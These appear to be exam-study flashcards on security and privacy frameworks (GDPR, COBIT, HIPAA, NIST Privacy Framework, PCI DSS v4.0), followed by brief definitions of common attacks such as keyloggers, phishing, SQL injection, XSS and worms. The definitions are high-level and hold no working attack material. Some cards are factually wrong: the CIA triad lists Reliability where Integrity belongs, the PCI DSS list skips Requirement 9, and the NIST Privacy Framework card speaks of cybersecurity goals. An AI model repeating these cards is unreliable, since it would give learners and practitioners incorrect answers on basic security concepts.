Security, Confidentiality, and Privacy Flashcards
General Data Protection Regulation (GDPR) 7 principles - global law
- Lawfulness, fairness & transparency
- Purpose limitation
- Data minimization
- Accuracy
- Storage limitation
- Integrity & confidentiality
- Accountability
COBIT governance system objective =
ensure alignment of IT with business goals & objectives
HIPAA (security standard) 2 Safeguards
- Administrative Safeguards
a. conducting regular risk assessments and audits - Technical/Physical Safeguards
a. encrypting PHI in transit & at rest
b. installing firewalls & antivirus software
c. locking cabinets & doors that contain PHI
Access Control Mechanism:
Hardware/software features, operating/management procedures, and various combinations of these designed to prevent and detect unauthorized access and to permit authorized access in an automated system
National Institute of Standards and Technology (NIST) Privacy Framework:
designed to help organizations achieve their specific cybersecurity goals and objectives to achieve key business outcomes
- Core: set of privacy activates and outcomes
- Profiles: selection of specific functions, categories & subcategories from the Core that reflect an organizations privacy goals & needs
- Implementation Tiers: tool for evaluating an organizations privacy risk management practices
Payment Card Industry Data Security Standard (PCI DSS):
optimize the security of credit, debit and cash card transactions
NIST Privacy Framework single privacy objective =
Personally identifiable information must be collected, used, retained, and disclosed in compliance with the commitments in the entity’s privacy notice and with criteria set out in the NIST Privacy Framework
CIA triad
- Availability
- Confidentiality
- Reliability
Privacy by default:
building privacy safeguards at the outset (limit data collection or refer to privacy as the default setting)
PCI DSS v4.0 Goals (6) and Core Requirements (12)
a. Build and Maintain a Secure Network and Systems
Requirement 1: Install and maintain network security controls.
Requirement 2: Apply secure configurations to all system components.
b. Protect Account Data
Requirement 3: Protect stored account data.
Requirement 4: Protect cardholder data with strong cryptography during transmission over open, public networks
c. Maintain a Vulnerability Management Program
Requirement 5: Protect all systems and networks from malicious software.
Requirement 6: Develop and maintain secure systems and software
d. Implement Strong Access Control Measures
Requirement 7: Restrict access to system components and cardholder data by business need to know.
Requirement 8: Identify users and authenticate access to system components.
e. Regularly Monitor and Test Networks
Requirement 10: Log and monitor all access to system components and cardholder data.
Requirement 11: Test the security of systems and networks regularly.
f. Maintain an Information Security Policy
Requirement 12: Support information security with organizational policies and programs.
Email spoofing:
perpetrator pretends to be someone else
Password spoofing:
perpetrator tricks user into logging into malicious system to capture username & password
Keyloggers:
malicious software designed to track every keystroke to obtain user credentials to give to attacker
Social engineering:
uses persuasion/deception to gain access to IT systems (impersonation through phone or email, dumpster diving & shoulder surfing)
Electronic trashing:
accessing residual data after a file has been deleted
Electronic piggybacking:
gaining unauthorized access to a resource via another user’s legitimate credentials
Network analysis attack:
perpetrator performs research to build a complete profile of an organizations network infrastructure & architecture
Masquerading attack:
attempt to gain access to computer system or facility by posing as an authorized user
Email bombing:
sending identical email message to particular email ID several times
Malware attack:
deploying malicious software to compromise systems, steal data or disrupt operations
Sniffing attack:
eavesdropping on network traffic to intercept and capture data
Phishing attack:
tricking users into revealing sensitive info through emails or websites
Nonrepudiation:
ensure senders of a message cannot deny sending info & that receivers cannot deny receiving it
Web application attack:
exploiting vulnerabilities in web applications
Distributed denial of service (DDoS) attack:
overwhelming a target system with a flood of traffic or requests causing it to become unavailable to legitimate users
Cybersecurity attacker:
specific threat agent actively launching attacks against an organizations systems
SQL injection attack:
manipulates input fields to inject SQL code into a database query
Cross-site scripting (XSS) attack:
injects malicious scripts into a web application (comments or input fields)
Logic bomb:
uses a computer program to trigger an unauthorized malicious activity at a prespecified event (financial calculation exceeds a specific dollar amount)
Worm:
independent computer program that reproduces by copying itself from 1 system to another, do not require human involvement (uses open file shares to infect several workstations quickly)